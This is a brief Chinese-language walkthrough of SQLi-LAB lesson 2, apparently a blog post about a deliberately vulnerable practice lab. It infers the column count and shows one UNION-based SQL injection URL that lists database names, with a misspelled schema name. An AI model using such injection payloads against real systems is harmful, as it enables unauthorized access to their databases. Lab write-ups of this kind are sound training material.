SQLi-LAB lesson2 Error based解析

SQLi-LAB lesson2 Error based解析_第1张图片
image.png
SQLi-LAB lesson2 Error based解析_第2张图片
image.png
image.png

猜测sql语句应该是select * from table where id = 'input'
3没报错 4报错,所以长度是3


SQLi-LAB lesson2 Error based解析_第3张图片
image.png
SQLi-LAB lesson2 Error based解析_第4张图片
image.png

剩下的就是union注入了
获取数据库名
http://192.168.182.128/Less-2/?id=111 union select 1,schema_name,3 from infromation_schema.schemata

SQLi-LAB lesson2 Error based解析_第5张图片
image.png

你可能感兴趣的:(SQLi-LAB lesson2 Error based解析)